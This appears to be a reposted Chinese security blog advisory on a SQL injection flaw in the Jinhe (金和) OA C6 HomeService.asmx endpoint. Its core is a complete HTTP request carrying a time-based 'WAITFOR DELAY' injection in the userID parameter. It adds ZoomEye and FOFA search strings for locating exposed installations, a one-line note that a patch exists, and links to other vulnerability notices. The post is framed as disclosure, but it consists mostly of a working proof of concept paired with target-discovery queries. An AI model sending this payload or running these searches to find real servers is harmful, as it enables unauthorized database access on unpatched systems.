金和OA C6 HomeService.asmx SQL注入【附POC】

admin

104722
文章

87
评论

2024年1月9日12:14:11评论30 views字数 645阅读2分9秒阅读模式

漏洞详情

金和OAC6 HomeService.asmx接口处存在SQL注入漏洞

界面截图

金和OA C6 HomeService.asmx SQL注入【附POC】

漏洞复现

payload

GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close

回显：

金和OA C6 HomeService.asmx SQL注入【附POC】

语法

zoomeye：

app:"JingHe OA C6"

fofa：

app="金和网络-金和OA"

修复建议

官方已发布补丁

原文始发于微信公众号（棉花糖网络安全圈）：金和OA C6 HomeService.asmx SQL注入【附POC】

左青龙
微信扫一扫

右白虎
微信扫一扫

金和OA C6 HomeService.asmx SQL注入【附POC】

【漏洞预警】Google Chrome WebP堆缓冲区溢出漏洞威胁通告

H3C ER G2系列路由器敏感信息泄露漏洞

【漏洞通告】城管智慧执法系统任意文件上传漏洞

【漏洞通告】Microsoft 流式处理代理特权提升漏洞

【漏洞通告】宏景 openFile.jsp 任意文件读取漏洞

【漏洞通告】紫光档案系统 upload.html 任意文件上传漏洞

【漏洞预警/复现】广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158

漏洞预警 | Ruvar OA SQL注入漏洞

漏洞预警 | User Meta敏感信息泄露漏洞

漏洞预警 | 联软安全数据交换系统任意文件读取漏洞

发表评论

在线咨询

微信